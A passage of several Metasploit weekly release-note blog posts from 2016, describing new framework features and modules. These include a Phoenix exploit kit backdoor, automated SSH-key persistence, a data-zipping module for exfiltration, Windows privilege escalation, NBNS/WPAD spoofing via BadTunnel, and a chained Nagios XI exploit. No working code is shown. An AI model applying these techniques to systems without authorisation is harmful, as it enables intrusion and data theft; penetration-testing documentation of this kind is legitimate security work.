Security is hard and even experts like us screw it up some times. But in true Metasploit fashion, we're not content to just patch the vuln. There is currently a Pull Request in review that will get you shells on Metasploit if you know credentials. Since it's Authenticated Code Execution by Design, it will work even without this vulnerability as long as you can steal a username and password. Expect that to land soon and be in the next wrapup. And while you're waiting, go double check to make sure you did the initial account setup on your Metasploit installs.

 

Download improvements

 

It's a bit of a hassle if a download gets interrupted, especially if the file is large. Thanks to first-time contributor cayee, you can now continue an interrupted download with Meterpreter's new download -c.

 

Module documentation

 

We've been pumping out better documentation for individual modules for a few months now, since the introduction of info -d, which gives you nice pretty markdown.

 

If you have wanted to contribute but didn't know what you wanted to work on, this is a great place to get started. Check out the Module Documentation milestone for a list of the modules we think are the highest priority. Github won't let you assign a ticket to someone who isn't part of the Metasploit organization, so leave a comment on one of those issues to claim it so others don't duplicate your work.

 

New Modules

Exploit modules (1 new)

Auxiliary and post modules (4 new)

Get it

 

As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.12.22...4.12.25

 

To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Sep 2, 2016

PHP Shells Rising from the Flames

 

Phoenix Exploit Kit is your standard run-of-the-mill crimeware system, written in PHP, whose creator apparently got popped by the FSB earlier this year. Like many exploit kits, it has a back door, this one allowing you to eval whatever PHP code you like by sending it in a GET parameter (subtly named 'bdr'). Of course running arbitrary PHP allows us control of the underlying operating system to various degrees depending on configuration.

 

I love the idea of popping shells in malware. We've been doing it for a while, since way back in the day with exploit/windows/ftp/sasser_ftpd_port, an exploit for the FTP server run on compromised machines by the sasser worm, and I was delighted to discover that I'm not the only one who finds exploits for malware to be hilarious.

 

MalSploitBase is a database of exploits for known vulns in evil things just like these. Even better, its code is available on github (https://github.com/misterch0c/malSploitBase) and the author encourages pull requests.

 

How come you never call anymore?

 

If you create child processes from your Meterpreter session, you often want to keep track of them and make sure they're not staying out too late or getting caught up with the wrong crowd. A new option to Meterpreter's ps command makes that a little easier, giving you a nice printout of all the children of your current process.

 

Other Post stuff

 

A few fun new modules from an up-and-coming contributor h00die make persistence on Linux a bit easier in the latest release. One of the big advantages of having modules for doing persistence instead of dropping files manually is the ability to automate it. For example, putting post/linux/manage/sshkey_persistence in your AutoRunscript option for an exploit lets you automatically establish a way back in without having to think about it in the crucial first few minutes of having a shell.

 

And finally, for an exciting exfiltration extravaganza, post/multi/manage/zip gives you a platform-agnostic way of zipping up a directory for simplified pilfering.

 

New Modules

 

Exploit modules (5 new)

Auxiliary and post modules (3 new)

 

Get it

 

As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.12.19...4.12.22

 

To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Jul 22, 2016

Windows Privilege Escalation

 

In the long long ago, Windows users pretty much universally had local Administrator accounts. While that's still true in less mature environments, I think we have done a pretty good job as an industry of convincing folks to reduce users' privileges. Back in those days, privilege escalation exploits weren't all that useful because every exploit, executable, and Word macro already gave you the highest privileges. Today that's less true.

 

Even worse for the enterprising hacker, modern browser exploitation frequently gives you the lowest possible privileges, even without the ability to read or write files outside of certain directories or interact with processes other than your own, due to sandboxing. One major advantage of kernel vulnerabilities is the fact that they skip right out of those sandboxes straight to NT AUTHORITY\SYSTEM.

 

Two Windows vulnerabilities, one patched in February and the second in March, get exploits this week for your privilege escalating pleasure.

 

Test Our Mettle

 

Over the years there have been several iterations of Meterpreter for a POSIX environment, with limited success. As of this week, we're shipping a new contender for the throne of unix payloads: Mettle. It's a ground-up implementation of the Meterpreter protocol and featureset for multiple architectures and POSIX platforms. One of the barriers to such a payload has been the fact that it requires packaging up a static libc and any libraries it will need on target. This is in contrast to Windows where the extreme adherence to backwards compatibility through the ages means that things like socket functions in ws2_32.dll can be relied upon pretty universally, which just isn't remotely true of all the various unices. Android's Bionic libc was the most recent, but several issues have made it clear we needed something else. Mettle uses musl, a small, highly portable, optimized libc. While we're currently only testing Linux, musl's portability will give us the ability to expand to other things like Solaris and BSD in the future.

 

The old implementation will continue to live side-by-side with the new one for a while, but once Mettle has the main required features, the Bionic-based POSIX Meterpreter will be allowed to retire to a beach somewhere to drink margaritas and complain about kids these days.

 

New Modules

 

Exploit modules (5 new)

Auxiliary and post modules (3 new)

Get it

 

As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.12.11...4.12.14

 

To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

egypt

Weekly Metasploit Wrapup

Posted by egypt Employee Jul 8, 2016

House keeping

 

Since the last Wrapup, we've been continuing our long-running project of breaking up some of the old cobweb-encrusted parts of the framework codebase into smaller pieces that are easier to deal with. A few things, lib/sshkey and lib/bit-struct in particular, that for historical reasons were just slightly modified copies of a gem, have been pulled out entirely in favor of the upstream release. A bunch of other things have been pulled out into their own repositories, making the whole codebase a little tidier.

 

NBNS and BadTunnel

 

NBNS is the NetBIOS Name Service, which Windows uses to do fast local translations of hostnames to IP addresses. Like DNS, being able to lie about answers gives an attacker the ability to act as a Man-in-the-Middle. Unlike DNS, Requests are sent broadcast to the local subnet. That means that listening for these requests and spoofing replies gets you a MitM stance on whatever they were requesting, a longstanding hacker favorite. This is also a downside because it means you have to be on the same local network as the victim to see those requests and know how to reply. However, all of this happens over UDP which routers don't mind forwarding on to different subnets. You just need to guess the transaction ID, a 16-bit number. As it turns out 16-bit numbers aren't that big and you can just spam packets until it works. You still need to know the hostname, though. Enter WPAD.

 

Hackers have loved Windows Proxy Automatic Discovery, or WPAD, forever. For those unfamiliar with it, it's an HTTP service that hosts a small piece of javascript for determining whether a given URL should go through a proxy. Windows uses this by default not just with all requests from Internet Explorer, but everything that uses the WinInet API.

One way to convince a client that you are their WPAD server is to respond to the NBNS lookup for a host with that name. Metasploit and other tools like Responder.py have been providing that handy service for years to great effect. But now with you don't need to be on the same subnet. Now you can just spam replies for WPAD for a few seconds until you get lucky and suddenly you can be in the middle of all HTTP requests by claiming to be their proxy. And it gets better. If you can somehow convince someone to send any NetBIOS traffic your way, you can do the same across NAT, thanks to BadTunnel.

 

Have fun storming the castle.

 

Chained exploits

 

Nagios is a nifty monitoring tool that has basically become the defacto standard. They also produce a proprietary commercial frontend called Nagios XI. That frontend has a SQL injection vuln that can lead to authentication bypass. The bypass gives you access to a command injection. The command injection lets you run sudo without a password. Nothing but net.

 

Expect a more detailed write up on this one.

 

New Modules

 

Exploit modules (6 new)

Auxiliary and post modules (5 new)

 

Get it

 

As always, you can update to the latest Metasploit Framework with a simple msfupdate and the full diff since the last blog post is available on GitHub: 4.12.7...4.12.11

 

To install fresh, check out the open-source-only Nightly Installers, or the binary installers which also include the commercial editions.

Filter Blog

By date: By tag: